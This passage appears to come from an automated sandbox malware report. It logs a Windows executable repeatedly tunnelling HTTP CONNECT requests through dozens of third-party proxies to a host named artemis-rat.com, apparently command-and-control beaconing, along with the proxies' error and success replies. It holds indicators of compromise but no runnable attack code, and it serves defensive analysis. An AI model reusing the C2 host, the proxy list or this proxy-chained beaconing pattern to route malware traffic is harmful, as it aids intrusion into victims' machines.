                                                                                                                                                                                                                                                            2045192.168.2.55408645.81.232.1747153876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.896028996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.989512920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.014513016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.074440002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2046192.168.2.552222162.241.53.72574953876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.897018909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.989495039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.014504910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.074436903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2047192.168.2.555200162.241.50.179314143876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.908425093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.998567104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.092972040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.092890978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2048192.168.2.555096117.160.250.163803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.908937931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.878261089 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:48 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.500655890 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:48 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.748056889 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:48 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
Mar 11, 2024 03:31:21.239886045 CET | 303 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:48 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
Mar 11, 2024 03:31:58.224327087 CET | 303 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:48 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2049192.168.2.55222145.5.118.439993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.919754982 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.993031979 CET | 202 | IN | HTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 715
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 24 Feb 2024 06:13:26 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 24 Feb 2024 06:13:26 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close
Mar 11, 2024 03:30:59.709484100 CET | 202 | IN | HTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 715
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Sat, 24 Feb 2024 06:13:26 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 24 Feb 2024 06:13:26 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2050192.168.2.55545560.188.102.225180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.921274900 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2051192.168.2.55546244.190.9.65481003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:48.010962963 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2052192.168.2.554740217.60.194.19831283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:48.022095919 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2053192.168.2.555453196.251.131.3880803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:48.023035049 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2054192.168.2.554133162.241.46.6500623876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:48.024703979 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.108040094 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.202153921 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:00.217822075 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2055192.168.2.5541105.252.23.22031283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:48.026571035 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.701894999 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405294895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.701956987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.275964022 CET39INHTTP/1.0 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2056192.168.2.55415651.222.241.157440293876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:48.026922941 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2057192.168.2.552238103.209.68.19780803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:48.031006098 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.575700998 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2058192.168.2.555458218.65.6.15031283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:48.039459944 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.381282091 CET | 704 | IN | HTTP/1.1 502 Bad Gateway
Server: huawei
Date: Mon, 11 Mar 2024 02:18:07 GMT
Content-Type: text/html
Content-Length: 553
Connection: keep-alive
Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>huawei</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2059192.168.2.552261119.93.148.19180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:48.041191101 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.388981104 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2060192.168.2.554137176.98.81.8580803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:48.041764021 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.201776028 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.202440023 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2061192.168.2.555459185.101.16.52803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:48.045095921 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2062192.168.2.55518845.11.95.16552193876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:48.047775030 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2063192.168.2.554104112.78.164.24880803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:48.050086975 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.201817989 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.202440023 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:00.202497005 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2064192.168.2.55515998.170.57.23141453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:48.054506063 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2065192.168.2.555464212.108.155.20590903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.269341946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2066192.168.2.554126190.128.241.102803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.269345999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.342081070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.514656067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.514692068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2067192.168.2.555461103.166.39.1736293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.269958973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2068192.168.2.55546946.35.9.110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.270174026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2069192.168.2.552370103.152.132.2931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.271769047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
